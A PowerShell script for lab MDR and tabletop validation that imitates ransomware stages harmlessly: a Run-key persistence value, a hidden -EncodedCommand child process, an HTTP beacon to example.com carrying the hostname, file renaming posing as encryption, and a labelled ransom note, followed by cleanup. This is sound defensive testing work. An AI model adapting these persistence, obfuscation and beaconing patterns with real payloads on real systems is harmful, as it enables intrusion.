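<#
.SYNOPSIS
    Simulated malicious activity for tabletop / MDR validation.

.DESCRIPTION
    NON-DESTRUCTIVE but performs behaviors that often trigger detections:
      - Outbound HTTP (Invoke-WebRequest)
      - Registry Run key (persistence)
      - Child PowerShell with -EncodedCommand
      - Local file "encryption" (rename only)

    IMPORTANT:
      - Run ONLY on a lab/test machine with MDR enabled.
      - After the test, run the cleanup (the -Cleanup switch, or the
        Cleanup-Simulation function at the bottom of this file).

.PARAMETER Cleanup
    Skip the simulation and only undo its artifacts: remove the HKCU Run value
    and rename *.simulated_encrypted files back to their original names.
    Functions defined in a script are not available after a plain
    ".\script.ps1" run (only after dot-sourcing), so this switch is the
    reliable way to reach Cleanup-Simulation:  .\<script>.ps1 -Cleanup

.NOTES
    The data folder, incident.log and the simulated ransom note are left in
    place by cleanup; remove them by hand once the after-action review is done.
#>
param(
    [switch]$Cleanup
)

# ---------------- CONFIGURATION ----------------
$RootPath     = "C:\SimulatedIncident"
$DataPath     = Join-Path $RootPath "VictimData"
$LogPath      = Join-Path $RootPath "incident.log"
$NotePath     = Join-Path $RootPath "README_SIMULATED_RANSOM_NOTE.txt"

# Harmless, well-known domain; plaintext HTTP + PowerShell + IWR is what the
# detection should key on, not the destination.
$FakeC2Url    = "http://example.com"
$FakeVictimId = [guid]::NewGuid().ToString()

# Registry persistence (lab only) – removed again by Cleanup-Simulation.
$RunKeyPath   = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
$RunValueName = "SimulatedMalware"

# ---------------- HELPER FUNCTIONS ----------------

# Writes a timestamped line to the console and appends it to $LogPath.
function Write-Log {
    param([string]$Message)

    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    $line = "[$timestamp] $Message"
    Write-Host $line

    # Cleanup may run in a fresh session where $RootPath no longer exists;
    # make sure the log's parent directory is there so Add-Content succeeds.
    $logDir = Split-Path -Parent $LogPath
    if (-not (Test-Path $logDir)) {
        New-Item -ItemType Directory -Path $logDir | Out-Null
    }

    # UTF8 to match the header written by Initialize-Environment; several
    # messages contain non-ASCII dashes that the default encoding would mangle.
    Add-Content -Path $LogPath -Value $line -Encoding UTF8
}

# Creates the working folders, seeds dummy "user data" and starts a fresh log.
function Initialize-Environment {
    Write-Host "=== SIMULATED MALWARE ACTIVITY (LAB ONLY) ==="
    Write-Host "This script is for MDR testing / tabletop exercises."
    Write-Host ""

    if (-not (Test-Path $RootPath)) {
        New-Item -ItemType Directory -Path $RootPath | Out-Null
    }

    if (-not (Test-Path $DataPath)) {
        New-Item -ItemType Directory -Path $DataPath | Out-Null

        # Dummy "user data" – the only files the rename phase will touch.
        1..5 | ForEach-Object {
            $dummyFile = Join-Path $DataPath ("Finance_Report_$($_).txt")
            "Dummy data file $($_) for MDR tabletop exercise." | Set-Content -Path $dummyFile
        }
    }

    # Out-File (not Add-Content) so every run starts a new log.
    "=== Simulated Incident Log ===" | Out-File -FilePath $LogPath -Encoding UTF8
    Write-Log "Simulation started. Victim ID: $FakeVictimId"
    Write-Log "RootPath: $RootPath"
}

# Phase 1: enumerate the dummy data files (file-discovery telemetry only).
function Simulate-Reconnaissance {
    Write-Log "Phase 1: Reconnaissance - enumerating files under $DataPath."
    Start-Sleep -Seconds 1

    $files = Get-ChildItem -Path $DataPath -File -ErrorAction SilentlyContinue
    foreach ($f in $files) {
        Write-Log "Found file: $($f.FullName) (Size: $($f.Length) bytes)"
        Start-Sleep -Milliseconds 200
    }
}

# Phase 2: write a benign autorun value under the HKCU Run key.
# The value only echoes a string; Cleanup-Simulation removes it again.
function Simulate-Persistence {
    Write-Log "Phase 2: Persistence - creating HKCU Run key (lab only)."
    Start-Sleep -Seconds 1

    $runCommand = 'powershell.exe -WindowStyle Hidden -NoProfile -Command "Write-Output ''Simulated autorun – tabletop only''"'

    try {
        if (-not (Test-Path $RunKeyPath)) {
            New-Item -Path $RunKeyPath -Force | Out-Null
        }
        New-ItemProperty -Path $RunKeyPath -Name $RunValueName -Value $runCommand -PropertyType String -Force | Out-Null
        Write-Log "Created Run key: $RunKeyPath\$RunValueName = $runCommand"
    }
    catch {
        Write-Log "Failed to create Run key: $($_.Exception.Message)"
    }
}

# Phase 3: one plaintext HTTP GET with "beacon" headers (victim id, hostname).
# Nothing sensitive is sent; an egress block or offline lab is an expected outcome.
function Simulate-WebCallback {
    Write-Log "Phase 3: Outbound HTTP callback using Invoke-WebRequest."
    Start-Sleep -Seconds 1

    try {
        Write-Log "Connecting to $FakeC2Url with dummy beacon data."
        $headers = @{
            "X-Victim-ID" = $FakeVictimId
            "X-Host"      = $env:COMPUTERNAME
            "X-Scenario"  = "MDR-Tabletop"
        }

        # Harmless GET, just to generate suspicious telemetry.
        Invoke-WebRequest -Uri $FakeC2Url -Headers $headers -Method GET -UseBasicParsing -TimeoutSec 5 | Out-Null
        Write-Log "Invoke-WebRequest completed (or timed out) – this is expected."
    }
    catch {
        Write-Log "Invoke-WebRequest error (likely blocked or offline lab): $($_.Exception.Message)"
    }
}

# Phase 4: spawn a hidden child PowerShell using -EncodedCommand.
# The encoded payload only sleeps and prints a line.
function Simulate-EncodedCommandChild {
    Write-Log "Phase 4: Launching child PowerShell with -EncodedCommand."
    Start-Sleep -Seconds 1

    # Benign payload, but encoded (common attacker pattern).
    $innerCmd = 'Start-Sleep -Seconds 5; Write-Output "Simulated malicious child – benign payload."'
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($innerCmd)
    $b64   = [Convert]::ToBase64String($bytes)

    # Named $childArgs rather than $args: $args is a PowerShell automatic
    # variable and assigning to it shadows it (PSAvoidAssignmentToAutomaticVariable).
    $childArgs = "-NoProfile -WindowStyle Hidden -EncodedCommand $b64"

    Write-Log "Starting: powershell.exe $childArgs"
    try {
        Start-Process -FilePath "powershell.exe" -ArgumentList $childArgs -WindowStyle Hidden
        Write-Log "Child PowerShell started with -EncodedCommand."
    }
    catch {
        Write-Log "Failed to start child PowerShell: $($_.Exception.Message)"
    }
}

# Phase 5: "encrypt" the dummy files by appending .simulated_encrypted to the
# name. Contents are untouched; Cleanup-Simulation strips the suffix again.
function Simulate-Encryption {
    Write-Log "Phase 5: Simulated file encryption (rename only)."
    Start-Sleep -Seconds 1

    $files = Get-ChildItem -Path $DataPath -File -ErrorAction SilentlyContinue
    foreach ($f in $files) {
        $newName = $f.Name + ".simulated_encrypted"
        Write-Log "Renaming $($f.Name) -> $newName"
        Rename-Item -Path $f.FullName -NewName $newName -Force
        Start-Sleep -Milliseconds 200
    }
}

# Phase 6: write the simulated ransom note (plain text, clearly labelled).
function Drop-RansomNote {
    Write-Log "Phase 6: Dropping simulated ransom note."
    Start-Sleep -Seconds 1

    $note = @"
************************************************************
SIMULATED RANSOMWARE INCIDENT - LAB ONLY
************************************************************

This host has been used in an MDR tabletop exercise.
No real data has been encrypted or exfiltrated. All activity is simulated.

Details:
- Victim ID: $FakeVictimId
- Hostname: $($env:COMPUTERNAME)
- Date: $(Get-Date)

If you are seeing something like this in PRODUCTION:
1) Immediately isolate affected endpoints from the network.
2) Notify the incident response / security team.
3) Follow the organization’s incident response procedures.

For this EXERCISE:
- Use your normal detection, triage, and communication playbooks.
- Validate that your MDR provider detects:
  * PowerShell + Invoke-WebRequest
  * PowerShell child process with -EncodedCommand
  * Creation of a Run key in HKCU
  * Suspicious file renaming in user data paths

************************************************************
"@

    $note | Set-Content -Path $NotePath -Encoding UTF8
    Write-Log "Simulated ransom note written to: $NotePath"
}

# Final summary: where the artifacts are and a reminder to clean up.
function Complete-Simulation {
    Write-Log "Simulation complete. No destructive actions performed."
    Write-Host ""
    Write-Host "=== SIMULATION COMPLETE ==="
    Write-Host "Log file:    $LogPath"
    Write-Host "Data folder: $DataPath"
    Write-Host "Ransom note: $NotePath"
    Write-Host ""
    Write-Host "REMEMBER TO RUN CLEANUP AFTER THE EXERCISE (see function below)."
}

# Undoes the persistence and rename phases. Run via ".\<script>.ps1 -Cleanup",
# or dot-source the script and call Cleanup-Simulation manually.
# Safe to run more than once: a missing Run value or no *.simulated_encrypted
# files simply means there is nothing to do.
function Cleanup-Simulation {
    Write-Log "Running cleanup…"

    # Remove Run key value
    try {
        if (Test-Path $RunKeyPath) {
            if (Get-ItemProperty -Path $RunKeyPath -Name $RunValueName -ErrorAction SilentlyContinue) {
                Remove-ItemProperty -Path $RunKeyPath -Name $RunValueName -ErrorAction SilentlyContinue
                Write-Log "Removed Run key: $RunKeyPath\$RunValueName"
            }
        }
    }
    catch {
        Write-Log "Failed to remove Run key: $($_.Exception.Message)"
    }

    # Rename .simulated_encrypted back to original name
    $encryptedFiles = Get-ChildItem -Path $DataPath -Filter "*.simulated_encrypted" -File -ErrorAction SilentlyContinue
    foreach ($f in $encryptedFiles) {
        $originalName = $f.Name -replace '\.simulated_encrypted$', ''
        Write-Log "Restoring $($f.Name) -> $originalName"
        Rename-Item -Path $f.FullName -NewName $originalName -Force
    }

    Write-Log "Cleanup complete."
}

# ---------------- MAIN ----------------
if ($Cleanup) {
    # Only undo a previous run; do not generate any new telemetry.
    Cleanup-Simulation
    return
}

Initialize-Environment
Simulate-Reconnaissance
Simulate-Persistence
Simulate-WebCallback
Simulate-EncodedCommandChild
Simulate-Encryption
Drop-RansomNote
Complete-Simulation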